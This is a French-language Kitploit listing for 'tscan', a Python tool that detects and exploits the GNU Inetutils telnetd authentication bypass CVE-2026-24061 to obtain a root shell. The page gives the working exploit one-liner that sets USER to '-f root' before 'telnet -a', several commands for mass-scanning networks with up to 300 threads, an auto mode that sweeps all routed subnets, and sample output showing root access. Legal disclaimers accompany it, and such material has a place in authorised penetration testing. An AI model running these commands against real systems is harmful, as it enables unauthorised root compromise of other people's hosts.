Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
tscan — Scanner basé sur Python qui détecte et exploite la contournement d'authentification telnetd CVE-2026-24061, permettant un accès root au shell sur les services GNU Inetutils vulnérables. | Kitploit
Outils/GitHubGitHub/cumakurt/tscan
ReconnaissanceScanners de VulnérabilitésScan de PortsExploitationSécurité RéseauTests d'IntrusionApprentissage et Éducation
GitHubcumakurt/tscan

tscan

Scanner basé sur Python qui détecte et exploite la contournement d'authentification telnetd CVE-2026-24061, permettant un accès root au shell sur les services GNU Inetutils vulnérables.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de Contournement d'Authentification Telnetd (CVE-2026-24061)

Un scanner basé sur Python pour détecter et exploiter la vulnérabilité CVE-2026-24061 dans les services telnetd de GNU Inetutils. Cet outil analyse des adresses IP ou des réseaux à la recherche de services telnetd vulnérables permettant un contournement d'authentification menant à un accès root au shell.


⚠️ AVIS JURIDIQUE IMPORTANT ET CLAUSE DE NON-RESPONSABILITÉ

CE LOGICIEL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS DE SÉCURITÉ AUTORISÉS.

1. Objectif Éducatif

Cette application a été développée uniquement à des fins éducatives pour démontrer des vulnérabilités de sécurité et pour assister dans les tests de sécurité et la recherche autorisés.

2. Aucune Garantie

CE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS, SANS S'Y LIMITER, LES GARANTIES DE QUALITÉ MARCHANDE, D'ADAPTATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. LES AUTEURS ET CONTRIBUTEURS NE GARANTISSENT PAS QUE LE LOGICIEL SERA EXEMPT D'ERREURS, SÉCURISÉ OU FONCTIONNEL. Le logiciel peut contenir des bogues, des erreurs ou d'autres défauts.

3. Responsabilité de l'Utilisateur

TOUTE RESPONSABILITÉ ET TOUTE OBLIGATION LIÉES À L'UTILISATION DE CE LOGICIEL INCOMBENT ENTIÈREMENT À L'UTILISATEUR. Les auteurs, contributeurs et distributeurs de ce logiciel ne pourront être tenus responsables de tout dommage, perte ou conséquence juridique résultant de l'utilisation, de la mauvaise utilisation ou de l'incapacité à utiliser ce logiciel.

4. Utilisation Non Autorisée Interdite

Cet outil doit UNIQUEMENT être utilisé sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test. L'accès non autorisé à des systèmes informatiques est illégal et peut entraîner des poursuites pénales.

5. Aucune Garantie

Les auteurs ne GARANTISSENT PAS :

  • L'exactitude des résultats d'analyse
  • La sécurité de l'application elle-même
  • La compatibilité avec tous les systèmes
  • L'absence de bogues ou d'erreurs
  • Une fonctionnalité ou une performance spécifique

En utilisant ce logiciel, vous reconnaissez avoir lu, compris et accepté d'être lié par ces conditions. Si vous n'êtes pas d'accord, n'utilisez pas ce logiciel.


Développeur

Développé par : Cuma KURT
Email : [email protected]
LinkedIn : https://www.linkedin.com/in/cuma-kurt-34414917/

Informations sur la Vulnérabilité

CVE-2026-24061 : telnetd de GNU Inetutils jusqu'à la version 2.7 permet un contournement d'authentification à distance via une valeur -f root pour la variable d'environnement USER.

Score CVSS : 9,8 (Critique)

Référence : NVD CVE-2026-24061

Fonctionnalités

  • 🔍 Analyse de Ports : Détecte les ports telnet ouverts (par défaut : 23, personnalisable)
  • 🎯 Détection de Vulnérabilité : Teste l'exploitabilité de CVE-2026-24061
  • ⚡ Multithread : Analyse concurrente rapide avec nombre de threads configurable
  • 📁 Entrée Flexible : Prend en charge les adresses IP, les réseaux CIDR et les listes de cibles basées sur des fichiers
  • 🗺️ Détection Automatique : Détecte et analyse automatiquement les sous-réseaux à partir de la table de routage
  • 🛑 Interruption Sûre : Ctrl+C arrête l'analyse en toute sécurité et affiche les résultats partiels
  • 📊 Progression en Temps Réel : Barre de progression avec statistiques et résultats

Installation

Prérequis

  • Python 3.6 ou supérieur
  • Client telnet (généralement préinstallé sur Linux/macOS)

Installer les Dépendances

root@kitploit:~
pip3 install -r requirements.txt

Remarque : La plupart des dépendances font partie de la bibliothèque standard de Python. L'outil fonctionne directement avec Python 3.6+.

Utilisation

Utilisation de Base

root@kitploit:~
# Analyser une seule adresse IP
python3 tscan.py 192.168.1.1

# Analyser un réseau CIDR
python3 tscan.py 192.168.1.0/24

# Analyser avec un port personnalisé
python3 tscan.py -p 2323 192.168.1.1

# Analyser des cibles à partir d'un fichier
python3 tscan.py targets.txt

# Analyser plusieurs adresses IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Analyser plusieurs réseaux CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Réglage des Performances

root@kitploit:~
# Augmenter le nombre de threads pour une analyse plus rapide (100 threads)
python3 tscan.py -t 100 192.168.1.0/24

# Augmenter le délai d'attente pour les réseaux lents
python3 tscan.py --timeout 10 192.168.1.0/24

# Combiner les deux pour les analyses de grands réseaux
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Mode de Détection Automatique

root@kitploit:~
# Détecter et analyser automatiquement tous les sous-réseaux à partir de la table de routage du système
python3 tscan.py --auto
# ou utiliser la forme courte :
python3 tscan.py -a

# Détection automatique avec port personnalisé
python3 tscan.py --auto -p 2323
# ou :
python3 tscan.py -a -p 2323

# Détection automatique avec un nombre élevé de threads
python3 tscan.py --auto -t 200
# ou :
python3 tscan.py -a -t 200

Remarque : Le mode --auto lit la table de routage du système à l'aide de la commande ip route list ou route -n et analyse automatiquement tous les sous-réseaux détectés.

Exemples Concrets

root@kitploit:~
# Exemple 1 : Analyse rapide du réseau local
python3 tscan.py 192.168.1.0/24

# Exemple 2 : Analyse rapide avec forte concurrence
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Exemple 3 : Analyser un port telnet non standard
python3 tscan.py -p 2323 192.168.1.0/24

# Exemple 4 : Détection automatique et analyse de tous les sous-réseaux locaux
python3 tscan.py --auto
# ou :
python3 tscan.py -a

# Exemple 5 : Détection automatique avec paramètres personnalisés
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# ou :
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Options de la Ligne de Commande

root@kitploit:~
arguments positionnels :
  targets               Adresse(s) IP, réseau(x) CIDR ou chemin(s) de fichier contenant les cibles

options :
  -h, --help            Affiche ce message d'aide et quitte
  -p, --port PORT       Port telnet à analyser (par défaut : 23)
  -t, --threads THREADS Nombre de threads concurrents (par défaut : 50)
  --timeout TIMEOUT     Délai d'attente de connexion en secondes (par défaut : 5)
  -v, --verbose         Sortie détaillée
  -a, --auto            Détecte et analyse automatiquement tous les sous-réseaux à partir de la table de routage du système (route -n ou ip route list)

Format du Fichier d'Entrée

Créez un fichier texte avec une cible par ligne :

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Les lignes commençant par # sont traitées comme des commentaires et ignorées.

Sortie

L'outil fournit :

  1. Progression en Temps Réel : Affiche les résultats au fur et à mesure de leur découverte

    • Barre de progression avec pourcentage et statistiques
    • Nombre d'hôtes vulnérables affiché dans la barre de progression
    • [!] - Hôte vulnérable
    • [~] - Port ouvert mais non vulnérable
    • Les cibles avec port fermé sont ignorées silencieusement
    • Ctrl+C (KeyboardInterrupt) : Interrompt l'analyse en toute sécurité et affiche immédiatement les résultats partiels
  2. Rapport Récapitulatif : Comprend :

    • Nombre total de services telnet trouvés
    • Nombre d'hôtes vulnérables
    • Liste détaillée des hôtes vulnérables

Exemple de Sortie

Sortie d'Analyse de Base

root@kitploit:~
[*] Démarrage de l'analyse sur 256 cible(s)...
[*] Port : 23, Threads : 50, Délai d'attente : 5s

[*] Progression : [████████████████░░░░░░░░░░░░░░░░░░░░] 40,0 % (102/256) | Ouverts : 2 | Vulnérables : 1
[!] 192.168.1.100:23 - VULNÉRABLE
[*] Progression : [████████████████████████████████████] 100,0 % (256/256) | Ouverts : 3 | Vulnérables : 1
[+] Analyse terminée : 256/256 cibles analysées

======================================================================
Résumé des Résultats d'Analyse
======================================================================

Services telnet trouvés : 3
Hôtes vulnérables : 1

[!] HÔTES VULNÉRABLES :

  ● 192.168.1.100:23
    Sortie : uid=0(root) gid=0(root) groups=0(root)...

[~] Services telnet trouvés mais non vulnérables :

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Analyse terminée en 12,34 secondes

Comment Cela Fonctionne

  1. Détection de Port : Vérifie si le port telnet est ouvert sur les IP cibles
  2. Tentative d'Exploitation : Pour les ports ouverts, tente l'exploit CVE-2026-24061 :
    • Définit la variable d'environnement USER="-f root"
    • Se connecte via la commande telnet -a
    • Envoie des commandes de test pour vérifier l'accès root au shell
  3. Classification des Résultats : Catégorise les résultats comme vulnérables ou non vulnérables

Détails de l'Exploit

La vulnérabilité permet un contournement d'authentification en définissant la variable d'environnement USER sur -f root :

root@kitploit:~
USER="-f root" telnet -a IP_CIBLE [PORT]

Cela amène telnetd à interpréter la variable USER comme un indicateur, contournant l'authentification et accordant un accès root.

Limitations

  • Nécessite l'installation du client telnet
  • Fonctionne uniquement contre les versions vulnérables de telnetd (≤ 2.7)
  • Le mode de détection automatique nécessite la commande ip route list ou route -n

Dépannage

« Commande telnet introuvable »

Installez le client telnet :

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Généralement préinstallé

Aucun résultat trouvé

  • Vérifiez que les cibles sont accessibles
  • Vérifiez les règles du pare-feu
  • Assurez-vous que les services telnet sont réellement en cours d'exécution
  • Essayez d'augmenter le délai d'attente : --timeout 10

Utilisation Légale et Éthique

Cet outil est destiné à :

  • ✅ Tests de pénétration autorisés
  • ✅ Recherche en sécurité sur vos propres systèmes
  • ✅ Évaluation de vulnérabilités avec autorisation appropriée
  • ✅ Fins éducatives dans des environnements contrôlés

N'UTILISEZ PAS cet outil pour :

  • ❌ L'accès non autorisé à des systèmes
  • ❌ Des activités de piratage illégales
  • ❌ Toute activité sans autorisation explicite

Références

  • Détails de CVE-2026-24061
  • Analyse des Laboratoires SafeBreach

Licence

Ce programme est un logiciel libre : vous pouvez le redistribuer et/ou le modifier selon les termes de la Licence Publique Générale GNU telle que publiée par la Free Software Foundation, soit la version 3 de la Licence, soit (à votre choix) toute version ultérieure.

Ce programme est distribué dans l'espoir qu'il sera utile, mais SANS AUCUNE GARANTIE ; sans même la garantie implicite de QUALITÉ MARCHANDE ou d'ADAPTATION À UN USAGE PARTICULIER. Voir la Licence Publique Générale GNU pour plus de détails.

Vous devriez avoir reçu une copie de la Licence Publique Générale GNU avec ce programme. Sinon, voir https://www.gnu.org/licenses/.

Texte Complet de la Licence

Voir le fichier LICENSE pour le texte complet de la Licence Publique Générale GNU v3.0.

Clause de Non-Responsabilité

LES AUTEURS ET CONTRIBUTEURS NE SONT PAS RESPONSABLES DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE CAUSÉ PAR CET OUTIL.

Cet outil est fourni UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS DE SÉCURITÉ AUTORISÉS.

UTILISATION À VOS PROPRES RISQUES. Toute responsabilité et toute obligation liées à l'utilisation de ce logiciel incombent entièrement à l'utilisateur. Les auteurs ne garantissent pas l'exactitude, la sécurité ou la fonctionnalité de ce logiciel. Le logiciel est fourni « EN L'ÉTAT » sans aucune garantie d'aucune sorte.

Cette application a été développée uniquement à des fins éducatives. En utilisant ce logiciel, vous reconnaissez que :

  • Vous comprenez qu'il s'agit d'un outil éducatif
  • Toute responsabilité liée à son utilisation vous incombe
  • Les auteurs ne fournissent aucune garantie
  • Vous ne l'utiliserez que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test
  • L'utilisation non autorisée est illégale et peut entraîner des poursuites pénales

Si vous n'acceptez pas ces conditions, N'UTILISEZ PAS CE LOGICIEL.

Télécharger l’outil